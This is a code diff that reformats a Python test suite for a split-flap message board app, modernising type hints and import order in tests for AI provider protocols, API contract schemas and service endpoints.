 
 from __future__ import annotations
 
-from typing import Any, Dict, List
+from typing import Any
 
 import pytest
 
 from src.ai.protocols import (
     DEFAULT_PROTOCOL,
     PROTOCOLS,
-    Protocol,
     get_protocol,
     supported_protocols,
 )
-
 
 # ---------------------------------------------------------------------------
 # Registry
@@ -107,9 +105,7 @@ def test_openai_parse_content_list_parts():
 
 def test_openai_parse_usage():
     proto = PROTOCOLS["openai"]
-    usage = proto.parse_usage(
-        {"usage": {"prompt_tokens": 10, "completion_tokens": 20, "total_tokens": 30}}
-    )
+    usage = proto.parse_usage({"usage": {"prompt_tokens": 10, "completion_tokens": 20, "total_tokens": 30}})
     assert usage == {
         "prompt_tokens": 10,
         "completion_tokens": 20,
@@ -119,9 +115,7 @@ def test_openai_parse_usage():
 
 def test_openai_parse_error_extracts_message():
     proto = PROTOCOLS["openai"]
-    assert (
-        proto.parse_error({"error": {"message": "bad key"}}) == "bad key"
-    )
+    assert proto.parse_error({"error": {"message": "bad key"}}) == "bad key"
     assert proto.parse_error({"error": "string"}) is None
     assert proto.parse_error({}) is None
 
@@ -142,7 +136,7 @@ def test_anthropic_headers_use_x_api_key_and_version():
 
 def test_anthropic_body_lifts_system_to_top_level():
     proto = PROTOCOLS["anthropic"]
-    messages: List[Dict[str, Any]] = [
+    messages: list[dict[str, Any]] = [
         {"role": "system", "content": "be brief"},
         {"role": "user", "content": "hi"},
         {"role": "assistant", "content": "hello"},
@@ -174,9 +168,7 @@ def test_anthropic_body_concatenates_multiple_systems():
 
 def test_anthropic_body_omits_system_when_none():
     proto = PROTOCOLS["anthropic"]
-    body = proto.build_body(
-        "claude", [{"role": "user", "content": "hi"}], 0.0, 50
-    )
+    body = proto.build_body("claude", [{"role": "user", "content": "hi"}], 0.0, 50)
     assert "system" not in body
 
 
@@ -212,9 +204,7 @@ def test_anthropic_parse_content_handles_missing_content():
 
 def test_anthropic_parse_usage_normalizes_to_common_shape():
     proto = PROTOCOLS["anthropic"]
-    usage = proto.parse_usage(
-        {"usage": {"input_tokens": 7, "output_tokens": 13}}
-    )
+    usage = proto.parse_usage({"usage": {"input_tokens": 7, "output_tokens": 13}})
     assert usage == {
         "prompt_tokens": 7,
         "completion_tokens": 13,
@@ -234,10 +224,7 @@ def test_anthropic_parse_usage_handles_missing_fields():
 
 def test_anthropic_parse_error_extracts_message():
     proto = PROTOCOLS["anthropic"]
-    assert (
-        proto.parse_error({"error": {"type": "invalid_request_error", "message": "bad"}})
-        == "bad"
-    )
+    assert proto.parse_error({"error": {"type": "invalid_request_error", "message": "bad"}}) == "bad"
     assert proto.parse_error({}) is None
 
 
@@ -256,7 +243,7 @@ async def test_generate_page_uses_anthropic_wire_format(monkeypatch):
 
     from src.ai import generator as gen_mod
 
-    captured: Dict[str, Any] = {}
+    captured: dict[str, Any] = {}
 
     def handler(request: httpx.Request) -> httpx.Response:
         captured["url"] = str(request.url)
@@ -271,9 +258,7 @@ async def test_generate_page_uses_anthropic_wire_format(monkeypatch):
             "type": "template",
             "device_type": "flagship",
             "template": ["", "HELLO", "", "", "", ""],
-            "line_metadata": [
-                {"alignment": "center", "wrap": False} for _ in range(6)
-            ],
+            "line_metadata": [{"alignment": "center", "wrap": False} for _ in range(6)],
             "duration_seconds": 60,
         }
         import json as _json2
@@ -285,9 +270,7 @@ async def test_generate_page_uses_anthropic_wire_format(monkeypatch):
                 "type": "message",
                 "role": "assistant",
                 "model": "claude-3-5-sonnet-20241022",
-                "content": [
-                    {"type": "text", "text": _json2.dumps(page_json)}
-                ],
+                "content": [{"type": "text", "text": _json2.dumps(page_json)}],
                 "usage": {"input_tokens": 100, "output_tokens": 50},
             },
         )
@@ -411,7 +394,7 @@ async def test_generate_page_still_uses_openai_format_by_default(monkeypatch):
 
     from src.ai import generator as gen_mod
 
-    captured: Dict[str, Any] = {}
+    captured: dict[str, Any] = {}
 
     def handler(request: httpx.Request) -> httpx.Response:
         captured["url"] = str(request.url)
@@ -421,9 +404,7 @@ async def test_generate_page_still_uses_openai_format_by_default(monkeypatch):
             "type": "template",
             "device_type": "flagship",
             "template": ["", "HELLO", "", "", "", ""],
-            "line_metadata": [
-                {"alignment": "center", "wrap": False} for _ in range(6)
-            ],
+            "line_metadata": [{"alignment": "center", "wrap": False} for _ in range(6)],
             "duration_seconds": 60,
         }
         import json as _json
@@ -431,9 +412,7 @@ async def test_generate_page_still_uses_openai_format_by_default(monkeypatch):
         return httpx.Response(
             200,
             json={
-                "choices": [
-                    {"message": {"role": "assistant", "content": _json.dumps(page_json)}}
-                ],
+                "choices": [{"message": {"role": "assistant", "content": _json.dumps(page_json)}}],
                 "usage": {
                     "prompt_tokens": 1,
                     "completion_tokens": 2,

--- a/tests/ai/test_template_validator.py
+++ b/tests/ai/test_template_validator.py
@@ -6,7 +6,6 @@ import pytest
 
 from src.ai.template_validator import repair_template_lines
 
-
 # ---------------------------------------------------------------------------
 # The reported bug.
 # ---------------------------------------------------------------------------
@@ -60,9 +59,7 @@ def test_applies_to_fill_space_repeat_alias():
 
 
 def test_repairs_multiple_occurrences_on_same_line():
-    repaired, warnings = repair_template_lines(
-        ["{{filled:red.}}A{{filled:blue,}}"]
-    )
+    repaired, warnings = repair_template_lines(["{{filled:red.}}A{{filled:blue,}}"])
     assert repaired == ["{{filled:red}}A{{filled:blue}}"]
     assert len(warnings) == 2
 

--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -1,7 +1,8 @@
 # tests/conftest.py
 
-import pytest
 from unittest.mock import Mock
+
+import pytest
 
 
 @pytest.fixture(autouse=True)
@@ -30,12 +31,9 @@ def mock_board_client():
     """Mock client for Vestaboard API interactions."""
     client = Mock()
     client.post_message.return_value = {"success": True}
-    client.get_board.return_value = {
-        "id": "test_board",
-        "title": "Test Board",
-        "layout": [[0] * 22 for _ in range(6)]
-    }
+    client.get_board.return_value = {"id": "test_board", "title": "Test Board", "layout": [[0] * 22 for _ in range(6)]}
     return client
+
 
 @pytest.fixture
 def mock_api_client():
@@ -45,6 +43,7 @@ def mock_api_client():
     client.post.return_value = {"status": 201, "data": {}}
     return client
 
+
 @pytest.fixture
 def sample_page():
     """Sample page data for testing."""
@@ -52,11 +51,9 @@ def sample_page():
         "id": "test_page",
         "title": "Test Page",
         "content": "Hello, World!",
-        "variables": {
-            "weather": {"temperature": 72, "condition": "Sunny"},
-            "time": "12:00 PM"
-        }
+        "variables": {"weather": {"temperature": 72, "condition": "Sunny"}, "time": "12:00 PM"},
     }
+
 
 @pytest.fixture
 def sample_schedule():
@@ -64,19 +61,11 @@ def sample_schedule():
     return {
         "id": "test_schedule",
         "name": "Test Schedule",
-        "entries": [
-            {"day": "Monday", "page_id": "test_page", "time": "09:00"}
-        ]
+        "entries": [{"day": "Monday", "page_id": "test_page", "time": "09:00"}],
     }
+
 
 @pytest.fixture
 def sample_plugin():
     """Sample plugin config for testing."""
-    return {
-        "name": "weather",
-        "enabled": True,
-        "config": {
-            "api_key": "test_key",
-            "location": "San Francisco"
-        }
-    }
+    return {"name": "weather", "enabled": True, "config": {"api_key": "test_key", "location": "San Francisco"}}

--- a/tests/contract/conftest.py
+++ b/tests/contract/conftest.py
@@ -5,8 +5,9 @@ the schemas the Next.js frontend expects to consume. Using Pydantic models
 as the source of truth for schema validation.
 """
 
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
 
 from src.api_server import app
@@ -29,6 +30,7 @@ def mock_page_service():
 
         # create_page returns a minimal valid Page object
         from src.pages.models import Page
+
         sample_page = Page(
             id="contract-page-1",
             name="Contract Test Page",
@@ -49,6 +51,7 @@ def mock_schedule_service():
         svc = Mock()
 
         from src.schedules.models import ScheduleEntry as Schedule
+
         sample_schedule = Schedule(
             id="contract-schedule-1",
             page_id="contract-page-1",

--- a/tests/contract/schemas.py
+++ b/tests/contract/schemas.py
@@ -8,9 +8,9 @@ before it reaches production.
 Each schema is defined with strict=True to reject unexpected fields by default.
 """
 
-from typing import Any, Dict, List, Optional, Union
-from pydantic import BaseModel
+from typing import Any
 
+from pydantic import BaseModel
 
 # ---------------------------------------------------------------------------
 # Core / Health
@@ -19,11 +19,13 @@ from pydantic import BaseModel
 
 class HealthResponse(BaseModel):
     """GET /health"""
+
     status: str  # "ok"
 
 
 class VersionResponse(BaseModel):
     """GET /version"""
+
     package_version: str
     build_version: str
     is_dev: bool
@@ -31,9 +33,10 @@ class VersionResponse(BaseModel):
 
 class StatusResponse(BaseModel):
     """GET /status"""
+
     running: bool
-    active_page: Optional[str] = None
-    uptime_seconds: Optional[float] = None
+    active_page: str | None = None
+    uptime_seconds: float | None = None
 
 
 # ---------------------------------------------------------------------------
@@ -43,24 +46,27 @@ class StatusResponse(BaseModel):
 
 class PageSchema(BaseModel):
     """A single page object as returned by the backend."""
+
     id: str
     name: str
     type: str  # "template" | "single" | "composite" | "note"
-    template: Optional[Union[List[str], str]] = None
-    display_type: Optional[str] = None
-    rows: Optional[List[Any]] = None
-    created_at: Optional[str] = None
-    updated_at: Optional[str] = None
+    template: list[str] | str | None = None
+    display_type: str | None = None
+    rows: list[Any] | None = None
+    created_at: str | None = None
+    updated_at: str | None = None
 
 
 class PagesListResponse(BaseModel):
     """GET /pages"""
-    pages: List[PageSchema]
+
+    pages: list[PageSchema]
     total: int
 
 
 class CreatePageResponse(BaseModel):
     """POST /pages"""
+
     status: str  # "success"
     page: PageSchema
 
@@ -71,12 +77,14 @@ class GetPageResponse(PageSchema):
 
 class UpdatePageResponse(BaseModel):
     """PUT /pages/{page_id}"""
+
     status: str  # "success"
     page: PageSchema
 
 
 class DeletePageResponse(BaseModel):
     """DELETE /pages/{page_id}"""
+
     status: str  # "success" | "not_found"
 
 
@@ -87,46 +95,53 @@ class DeletePageResponse(BaseModel):
 
 class ScheduleSchema(BaseModel):
     """A single schedule entry."""
+
     id: str
     page_id: str
     start_time: str  # "HH:MM"
     end_time: str  # "HH:MM"
     day_pattern: str  # "daily" | "weekdays" | "weekends" | ...
-    board_id: Optional[str] = None
-    enabled: Optional[bool] = None
+    board_id: str | None = None
+    enabled: bool | None = None
 
 
 class SchedulesListResponse(BaseModel):
     """GET /schedules"""
-    schedules: List[ScheduleSchema]
+
+    schedules: list[ScheduleSchema]
     total: int
 
 
 class CreateScheduleResponse(BaseModel):
     """POST /schedules"""
+
     status: str
     schedule: ScheduleSchema
 
 
 class GetScheduleResponse(BaseModel):
     """GET /schedules/{schedule_id}"""
+
     schedule: ScheduleSchema
 
 
 class SchedulesEnabledResponse(BaseModel):
     """GET /schedules/enabled"""
+
     enabled: bool
 
 
 class ActivePageResponse(BaseModel):
     """GET /schedules/active/page"""
-    page_id: Optional[str] = None
+
+    page_id: str | None = None
     active: bool
 
 
 class DefaultPageResponse(BaseModel):
     """GET /schedules/default-page"""
-    page_id: Optional[str] = None
+
+    page_id: str | None = None
 
 
 # ---------------------------------------------------------------------------
@@ -136,31 +151,35 @@ class DefaultPageResponse(BaseModel):
 
 class TransitionSettingsResponse(BaseModel):
     """GET /settings/transitions"""
+
     strategy: str
-    step_interval_ms: Optional[int] = None
-    step_size: Optional[int] = None
+    step_interval_ms: int | None = None
+    step_size: int | None = None
 
 
 class OutputSettingsResponse(BaseModel):
     """GET /settings/output"""
+
     target: str  # "ui" | "board" | ...
 
 
 class BoardInstanceSchema(BaseModel):
     """A single board instance in the board settings."""
-    id: Optional[str] = None
+
+    id: str | None = None
     name: str
-    device_type: Optional[str] = None
-    board_color: Optional[str] = None
-    api_mode: Optional[str] = None
-    enabled: Optional[bool] = None
+    device_type: str | None = None
+    board_color: str | None = None
+    api_mode: str | None = None
+    enabled: bool | None = None
 
 
 class BoardSettingsResponse(BaseModel):
     """GET /settings/board"""
-    boards: List[Dict[str, Any]]
-    board_type: Optional[str] = None
-    devices: Optional[List[str]] = None
+
+    boards: list[dict[str, Any]]
+    board_type: str | None = None
+    devices: list[str] | None = None
 
 
 # ---------------------------------------------------------------------------
@@ -170,25 +189,28 @@ class BoardSettingsResponse(BaseModel):
 
 class PluginSchema(BaseModel):
     """A single plugin entry as returned by /plugins."""
+
     id: str
     name: str
     enabled: bool
-    version: Optional[str] = None
-    description: Optional[str] = None
-    category: Optional[str] = None
+    version: str | None = None
+    description: str | None = None
+    category: str | None = None
 
 
 class PluginsListResponse(BaseModel):
     """GET /plugins"""
-    plugins: List[PluginSchema]
+
+    plugins: list[PluginSchema]
 
 
 class PluginDetailResponse(BaseModel):
     """GET /plugins/{plugin_id}"""
+
     id: str
     name: str
     enabled: bool
-    version: Optional[str] = None
-    description: Optional[str] = None
-    category: Optional[str] = None
-    config: Optional[Dict[str, Any]] = None
+    version: str | None = None
+    description: str | None = None
+    category: str | None = None
+    config: dict[str, Any] | None = None

--- a/tests/contract/test_pages_contract.py
+++ b/tests/contract/test_pages_contract.py
@@ -6,17 +6,18 @@ schema the Next.js frontend expects to consume.
 Issue: #502
 """
 
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
 
 from src.api_server import app
+from src.pages.models import Page
 from tests.contract.schemas import (
-    PagesListResponse,
     CreatePageResponse,
     GetPageResponse,
+    PagesListResponse,
 )
-from src.pages.models import Page
 
 
 @pytest.fixture
@@ -241,6 +242,7 @@ class TestDeletePageContract:
     def test_returns_200_on_delete(self, client, sample_page):
         with patch("src.api_server.get_page_service") as mock_svc:
             from src.pages.service import DeleteResult
+
             svc = Mock()
             svc.delete_page.return_value = DeleteResult(deleted=True)
             mock_svc.return_value = svc
@@ -252,6 +254,7 @@ class TestDeletePageContract:
     def test_response_has_status_field(self, client, sample_page):
         with patch("src.api_server.get_page_service") as mock_svc:
             from src.pages.service import DeleteResult
+
             svc = Mock()
             svc.delete_page.return_value = DeleteResult(deleted=True)
             mock_svc.return_value = svc

--- a/tests/contract/test_schedules_contract.py
+++ b/tests/contract/test_schedules_contract.py
@@ -6,16 +6,17 @@ schema the Next.js frontend expects.
 Issue: #502
 """
 
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
 
 from src.api_server import app
-from tests.contract.schemas import (
-    SchedulesEnabledResponse,
-    DefaultPageResponse,
-)
 from src.schedules.models import ScheduleEntry as Schedule
+from tests.contract.schemas import (
+    DefaultPageResponse,
+    SchedulesEnabledResponse,
+)
 
 
 @pytest.fixture
@@ -41,8 +42,10 @@ def sample_schedule():
 
 class TestListSchedulesContract:
     def test_returns_200(self, client):
-        with patch("src.api_server.get_schedule_service") as mock_svc, \
-             patch("src.api_server.get_settings_service") as mock_settings:
+        with (
+            patch("src.api_server.get_schedule_service") as mock_svc,
+            patch("src.api_server.get_settings_service") as mock_settings,
+        ):
             svc = Mock()
             svc.list_schedules.return_value = []
             svc.get_default_page.return_value = None
@@ -57,8 +60,10 @@ class TestListSchedulesContract:
         assert resp.status_code == 200
 
     def test_response_has_required_keys(self, client):
-        with patch("src.api_server.get_schedule_service") as mock_svc, \
-             patch("src.api_server.get_settings_service") as mock_settings:
+        with (
+            patch("src.api_server.get_schedule_service") as mock_svc,
+            patch("src.api_server.get_settings_service") as mock_settings,
+        ):
             svc = Mock()
             svc.list_schedules.return_value = []
             svc.get_default_page.return_value = None
@@ -75,8 +80,10 @@ class TestListSchedulesContract:
         assert "total" in data
 
     def test_schedules_is_list(self, client):
-        with patch("src.api_server.get_schedule_service") as mock_svc, \
-             patch("src.api_server.get_settings_service") as mock_settings:
+        with (
+            patch("src.api_server.get_schedule_service") as mock_svc,
+            patch("src.api_server.get_settings_service") as mock_settings,
+        ):
             svc = Mock()
             svc.list_schedules.return_value = []
             svc.get_default_page.return_value = None
@@ -91,8 +98,10 @@ class TestListSchedulesContract:
         assert isinstance(resp.json()["schedules"], list)
 
     def test_total_matches_schedules_length(self, client, sample_schedule):
-        with patch("src.api_server.get_schedule_service") as mock_svc, \
-             patch("src.api_server.get_settings_service") as mock_settings:
+        with (
+            patch("src.api_server.get_schedule_service") as mock_svc,
+            patch("src.api_server.get_settings_service") as mock_settings,
+        ):
             svc = Mock()
             svc.list_schedules.return_value = [sample_schedule]
             svc.get_default_page.return_value = None
@@ -108,8 +117,10 @@ class TestListSchedulesContract:
         assert data["total"] == len(data["schedules"])
 
     def test_schedule_item_has_required_fields(self, client, sample_schedule):
-        with patch("src.api_server.get_schedule_service") as mock_svc, \
-             patch("src.api_server.get_settings_service") as mock_settings:
+        with (
+            patch("src.api_server.get_schedule_service") as mock_svc,
+            patch("src.api_server.get_settings_service") as mock_settings,
+        ):
             svc = Mock()
             svc.list_schedules.return_value = [sample_schedule]
             svc.get_default_page.return_value = None
@@ -129,8 +140,10 @@ class TestListSchedulesContract:
         assert "day_pattern" in sched
 
     def test_schedule_time_format_is_hhmm(self, client, sample_schedule):
-        with patch("src.api_server.get_schedule_service") as mock_svc, \
-             patch("src.api_server.get_settings_service") as mock_settings:
+        with (
+            patch("src.api_server.get_schedule_service") as mock_svc,
+            patch("src.api_server.get_settings_service") as mock_settings,
+        ):
             svc = Mock()
             svc.list_schedules.return_value = [sample_schedule]
             svc.get_default_page.return_value = None
@@ -144,15 +157,16 @@ class TestListSchedulesContract:
 
         sched = resp.json()["schedules"][0]
         import re
-        assert re.match(r"^\d{2}:\d{2}$", sched["start_time"]), \
-            f"start_time format unexpected: {sched['start_time']}"
-        assert re.match(r"^\d{2}:\d{2}$", sched["end_time"]), \
-            f"end_time format unexpected: {sched['end_time']}"
+
+        assert re.match(r"^\d{2}:\d{2}$", sched["start_time"]), f"start_time format unexpected: {sched['start_time']}"
+        assert re.match(r"^\d{2}:\d{2}$", sched["end_time"]), f"end_time format unexpected: {sched['end_time']}"
 
     def test_wildcard_board_id_returns_no_default_or_enabled(self, client, sample_schedule):
         """board_id=* returns schedules without enabled/default_page_id semantics."""
-        with patch("src.api_server.get_schedule_service") as mock_svc, \
-             patch("src.api_server.get_settings_service") as mock_settings:
+        with (
+            patch("src.api_server.get_schedule_service") as mock_svc,
+            patch("src.api_server.get_settings_service") as mock_settings,
+        ):
             svc = Mock()
             svc.list_schedules.return_value = [sample_schedule]
             mock_svc.return_value = svc

--- a/tests/contract/test_settings_contract.py
+++ b/tests/contract/test_settings_contract.py
@@ -6,17 +6,18 @@ schema the Next.js frontend expects.
 Issue: #502
 """
 
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
 
 from src.api_server import app
 from tests.contract.schemas import (
-    HealthResponse,
-    VersionResponse,
-    TransitionSettingsResponse,
-    OutputSettingsResponse,
     BoardSettingsResponse,
+    HealthResponse,
+    OutputSettingsResponse,
+    TransitionSettingsResponse,
+    VersionResponse,
 )
 
 
@@ -99,6 +100,7 @@ class TestTransitionSettingsContract:
     def _make_transition_mock(self, strategy="column", step_interval_ms=50, step_size=1):
         """Create a transition settings mock with concrete attribute values."""
         from types import SimpleNamespace
+
         return SimpleNamespace(
             strategy=strategy,
             step_interval_ms=step_interval_ms,
@@ -157,6 +159,7 @@ class TestTransitionSettingsContract:
 class TestOutputSettingsContract:
     def _make_output_mock(self, target="ui"):
         from types import SimpleNamespace
+
         return SimpleNamespace(target=target)
 
     def test_returns_200(self, client):

--- a/tests/factories.py
+++ b/tests/factories.py
@@ -2,32 +2,34 @@
 
 """Factory functions for creating test objects with sensible defaults."""
 
+
 def create_test_page(**overrides):
     """Create a test page with optional overrides."""
     return {
         "id": overrides.get("id", "test_page"),
         "title": overrides.get("title", "Test Page"),
         "content": overrides.get("content", "Hello, World!"),
-        "variables": overrides.get("variables", {})
+        "variables": overrides.get("variables", {}),
     }
+
 
 def create_test_schedule(**overrides):
     """Create a test schedule with optional overrides."""
     return {
         "id": overrides.get("id", "test_schedule"),
         "name": overrides.get("name", "Test Schedule"),
-        "entries": overrides.get("entries", [
-            {"day": "Monday", "page_id": "test_page", "time": "09:00"}
-        ])
+        "entries": overrides.get("entries", [{"day": "Monday", "page_id": "test_page", "time": "09:00"}]),
     }
+
 
 def create_test_plugin(**overrides):
     """Create a test plugin config with optional overrides."""
     return {
         "name": overrides.get("name", "weather"),
         "enabled": overrides.get("enabled", True),
-        "config": overrides.get("config", {})
+        "config": overrides.get("config", {}),
     }
+
 
 def create_test_board_state(**overrides):
     """Create a test board state with optional overrides."""
@@ -36,5 +38,5 @@ def create_test_board_state(**overrides):
     return {
         "id": overrides.get("id", "test_board"),
         "title": overrides.get("title", "Test Board"),
-        "layout": overrides.get("layout", [[0] * cols for _ in range(rows)])
+        "layout": overrides.get("layout", [[0] * cols for _ in range(rows)]),
     }

--- a/tests/helpers.py
+++ b/tests/helpers.py
@@ -4,6 +4,7 @@
 
 import re
 
+
 def validate_board_layout(board_state):
     """Validate that a board state has correct layout structure."""
     if not isinstance(board_state, dict):
@@ -20,6 +21,7 @@ def validate_board_layout(board_state):
             raise AssertionError("Board cell must be an integer")
     return True
 
+
 def validate_api_response_shape(response, expected_fields):
     """Validate that an API response has the expected fields."""
     if not isinstance(response, dict):
@@ -28,6 +30,7 @@ def validate_api_response_shape(response, expected_fields):
     if missing:
         raise AssertionError(f"API response missing fields: {missing}")
     return True
+
 
 def validate_plugin_output_format(output, expected_keys):
     """Validate that plugin output matches expected format."""
@@ -38,9 +41,10 @@ def validate_plugin_output_format(output, expected_keys):
             raise AssertionError(f"Plugin output missing key: {key}")
     return True
 
+
 def validate_template_variables(template, variables):
     """Validate that template has required variables."""
-    pattern = r'\{\{(\w+)\}\}'
+    pattern = r"\{\{(\w+)\}\}"
     found_vars = set(re.findall(pattern, template))
     missing = found_vars - set(variables.keys())
     if missing:

--- a/tests/test_api_ai_endpoints.py
+++ b/tests/test_api_ai_endpoints.py
@@ -9,9 +9,10 @@ Covers:
 
 from __future__ import annotations
 
+from unittest.mock import patch
+
 import pytest
 from fastapi.testclient import TestClient
-from unittest.mock import patch
 
 from src.api_server import app
 from src.config_manager import ConfigManager
@@ -203,9 +204,7 @@ def test_generate_page_happy_path_mocks_generator(client, reset_config_singleton
             "type": "template",
             "device_type": "flagship",
             "template": ["", "12:34", "", "", "", ""],
-            "line_metadata": [
-                {"alignment": "center", "wrap": False} for _ in range(6)
-            ],
+            "line_metadata": [{"alignment": "center", "wrap": False} for _ in range(6)],
             "duration_seconds": 60,
         },
         "model_used": "test-model",
@@ -258,9 +257,7 @@ def test_generate_page_throttles_back_to_back_calls(client, reset_config_singlet
             "type": "template",
             "device_type": "flagship",
             "template": [""] * 6,
-            "line_metadata": [
-                {"alignment": "left", "wrap": False} for _ in range(6)
-            ],
+            "line_metadata": [{"alignment": "left", "wrap": False} for _ in range(6)],
             "duration_seconds": 60,
         },
         "model_used": "test-model",

--- a/tests/test_api_coverage.py
+++ b/tests/test_api_coverage.py
@@ -6,9 +6,11 @@ display settings, silence status, display send, page send, force refresh,
 debug endpoints (error paths), plugin endpoints, stocks, and transit cache.
 """
 
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
+
 from src.api_server import app
 
 
@@ -21,6 +23,7 @@ def client():
 # ---------------------------------------------------------------------------
 # Shared fixtures
 # ---------------------------------------------------------------------------
+
 
 @pytest.fixture
 def mock_service():
@@ -137,21 +140,20 @@ def mock_carousel_service():
 # Priority 1 – Service & Board Operations
 # ===========================================================================
 
+
 class TestStartService:
     """Tests for POST /start."""
 
     def test_start_already_running(self, client):
         """When service is already running, return status already_running."""
-        with patch("src.api_server._service_running", True), \
-             patch("src.api_server.get_service", return_value=Mock()):
+        with patch("src.api_server._service_running", True), patch("src.api_server.get_service", return_value=Mock()):
             response = client.post("/start")
             assert response.status_code == 200
             assert response.json()["status"] == "already_running"
 
     def test_start_no_service(self, client):
         """When service cannot be created, return 503."""
-        with patch("src.api_server._service_running", False), \
-             patch("src.api_server.get_service", return_value=None):
+        with patch("src.api_server._service_running", False), patch("src.api_server.get_service", return_value=None):
             response = client.post("/start")
             assert response.status_code == 503
 
@@ -160,8 +162,7 @@ class TestStartService:
         service = Mock()
         service.vb_client = None
         service.initialize.return_value = False
-        with patch("src.api_server._service_running", False), \
-             patch("src.api_server.get_service", return_value=service):
+        with patch("src.api_server._service_running", False), patch("src.api_server.get_service", return_value=service):
             response = client.post("/start")
             assert response.status_code == 503
             assert "initialization failed" in response.json()["detail"].lower()
@@ -173,17 +174,21 @@ class TestStartService:
 
         def fake_start():
             import src.api_server as mod
+
             mod._service_running = True
 
-        with patch("src.api_server._service_running", False), \
-             patch("src.api_server.get_service", return_value=service), \
-             patch("src.api_server.threading") as mock_threading, \
-             patch("src.api_server.asyncio") as mock_asyncio:
+        with (
+            patch("src.api_server._service_running", False),
+            patch("src.api_server.get_service", return_value=service),
+            patch("src.api_server.threading") as mock_threading,
+            patch("src.api_server.asyncio") as mock_asyncio,
+        ):
             thread = Mock()
             mock_threading.Thread.return_value = thread
             thread.start.side_effect = fake_start
             # mock asyncio.sleep to be a coroutine
             import asyncio
+
             mock_asyncio.sleep = asyncio.sleep
             response = client.post("/start")
             assert response.status_code == 200
@@ -193,9 +198,11 @@ class TestStartService:
         """Service thread starts but _service_running stays False."""
         service = Mock()
         service.vb_client = Mock()
-        with patch("src.api_server._service_running", False), \
-             patch("src.api_server.get_service", return_value=service), \
-             patch("src.api_server.threading") as mock_threading:
+        with (
+            patch("src.api_server._service_running", False),
+            patch("src.api_server.get_service", return_value=service),
+            patch("src.api_server.threading") as mock_threading,
+        ):
             thread = Mock()
             mock_threading.Thread.return_value = thread
             response = client.post("/start")
@@ -215,8 +222,7 @@ class TestStopService:
     def test_stop_success(self, client):
         """Stopping a running service."""
         service = Mock()
-        with patch("src.api_server._service_running", True), \
-             patch("src.api_server._service", service):
+        with patch("src.api_server._service_running", True), patch("src.api_server._service", service):
             response = client.post("/stop")
             assert response.status_code == 200
             assert response.json()["status"] == "stopped"
@@ -235,8 +241,10 @@ class TestSendWelcomeMessage:
 
     def test_welcome_board_not_configured(self, client):
         """Welcome fails when board client cannot be created."""
-        with patch("src.api_server.Config") as mock_config, \
-             patch("src.board_client.BoardClient", side_effect=ValueError("no key")):
+        with (
+            patch("src.api_server.Config") as mock_config,
+            patch("src.board_client.BoardClient", side_effect=ValueError("no key")),
+        ):
             mock_config.is_silence_mode_active.return_value = False
             mock_config.BOARD_API_MODE = "local"
             mock_config.get_board_api_key.return_value = "test_key_12345"
@@ -246,10 +254,12 @@ class TestSendWelcomeMessage:
 
     def test_welcome_success(self, client):
         """Welcome message sent successfully."""
-        with patch("src.api_server.Config") as mock_config, \
-             patch("src.board_client.BoardClient") as MockBoardClient, \
-             patch("src.api_server.text_to_board_array") as mock_ttba, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server.Config") as mock_config,
+            patch("src.board_client.BoardClient") as MockBoardClient,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
             mock_config.is_silence_mode_active.return_value = False
             mock_config.BOARD_API_MODE = "local"
             mock_config.get_board_api_key.return_value = "test_key_12345"
@@ -275,10 +285,12 @@ class TestSendWelcomeMessage:
 
     def test_welcome_send_failure(self, client):
         """Welcome message fails to send."""
-        with patch("src.api_server.Config") as mock_config, \
-             patch("src.board_client.BoardClient") as MockBoardClient, \
-             patch("src.api_server.text_to_board_array") as mock_ttba, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server.Config") as mock_config,
+            patch("src.board_client.BoardClient") as MockBoardClient,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
             mock_config.is_silence_mode_active.return_value = False
             mock_config.BOARD_API_MODE = "local"
             mock_config.get_board_api_key.return_value = "test_key_12345"
@@ -303,10 +315,12 @@ class TestSendWelcomeMessage:
 
     def test_welcome_unchanged(self, client):
         """Welcome message unchanged (was_sent=False, success=True)."""
-        with patch("src.api_server.Config") as mock_config, \
-             patch("src.board_client.BoardClient") as MockBoardClient, \
-             patch("src.api_server.text_to_board_array") as mock_ttba, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server.Config") as mock_config,
+            patch("src.board_client.BoardClient") as MockBoardClient,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
             mock_config.is_silence_mode_active.return_value = False
             mock_config.BOARD_API_MODE = "cloud"
             mock_config.get_board_api_key.return_value = "test_cloud_key"
@@ -334,10 +348,12 @@ class TestSendWelcomeMessage:
 
     def test_welcome_uses_note_template_for_note_board(self, client):
         """When the configured board is a Note, render the 3x15 template."""
-        with patch("src.api_server.Config") as mock_config, \
-             patch("src.board_client.BoardClient") as MockBoardClient, \
-             patch("src.api_server.text_to_board_array") as mock_ttba, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server.Config") as mock_config,
+            patch("src.board_client.BoardClient") as MockBoardClient,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
             mock_config.is_silence_mode_active.return_value = False
             mock_config.BOARD_API_MODE = "local"
             mock_config.get_board_api_key.return_value = "test_key_12345"
@@ -381,10 +397,12 @@ class TestSendWelcomeMessage:
 
     def test_welcome_uses_flagship_template_for_flagship_board(self, client):
         """When the configured board is a Flagship, render the 6x22 template."""
-        with patch("src.api_server.Config") as mock_config, \
-             patch("src.board_client.BoardClient") as MockBoardClient, \
-             patch("src.api_server.text_to_board_array") as mock_ttba, \
-             patch("src.api_server.get_settings_service") as mock_ss:
+        with (
+            patch("src.api_server.Config") as mock_config,
+            patch("src.board_client.BoardClient") as MockBoardClient,
+            patch("src.api_server.text_to_board_array") as mock_ttba,
+            patch("src.api_server.get_settings_service") as mock_ss,
+        ):
